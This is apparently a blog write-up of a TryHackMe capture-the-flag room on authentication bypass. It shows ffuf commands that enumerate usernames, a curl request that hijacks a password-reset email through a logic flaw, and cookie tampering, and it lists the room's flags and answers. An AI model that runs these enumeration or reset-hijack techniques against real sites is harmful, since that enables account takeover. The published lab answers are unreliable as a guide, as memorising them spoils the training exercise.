Authentication Bypass -TryHackMe

4 months ago 26

Authentication bypass is the critical type of vulnerability that leads to exposure of sensitive information of legitimate persons.

Username Enumeration:

Username enumeration is the concept in which used to gather the information of a particular email address/username that was already registered by them.

Ffuf is the best tool that is used for brute-forcing and enumeration so on. By using the Ffuf tool we can make username enumeration as effective as.

At first, go to the target address signup page enter the username as admin and follow your details, and click signup which gave me an error that “An account with this username already exists”. By making use of this error which helps to find valid usernames.

For this I use the command:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d “username=FUZZ&email=x&password=x&cpassword=x” -H “Content-Type: application/x-www-form-urlencoded” -u http://Target_address/customers/signup -mr “username already exists”

And the result is:

From the above screenshot, we could find steve password(thunder)

Logic Flaw:

Logical path of application that is circumvented and manipulated by hacker.

Let’s go into logic flaw practical demonstrartion:

Enter the password reset form with provided email address and username form fields.

Which gave me notification about successfully sent message.

Then we do changes to tamper the reset link by entering the curl command in terminal.

curl ‘http://10.10.179.172/customers/reset?email=robert@acmeitsupport.thm' -H ‘Content-Type: application/x-www-form-urlencoded’ -d ‘username=robert&email={username}@customer.acmeitsupport.thm’

We will get details of flag from it by looking at my mail by attaching my email at the end of username of robert.

After typing above curl command go for your account and check under support tickets you would able to saw ticket contents.

In that contents you would able to saw link over there and navigating you saw link.

Cookie Tampering:

By tampering the cookies we will get into the unauthenticate session.

curl http://target_ip/cookie-test this is used to check whether the cookie logged in or not.

This command is used to displayed as logged in as User.

Then finally we found flag for it.

What is the flag from changing the plain text cookie values?

THM{COOKIE_TAMPERING}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

I use crackstation for finding the solutions for it.

463729

What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

THM{BASE64_ENCODING}

Encode the following value using base64 {“id”:1,”admin”:true}

eyJpZCI6MSwiYWRtaW4iOnRydWV9

Thank you for time spending to read my blog to get more stories keep follow.

Read Entire Article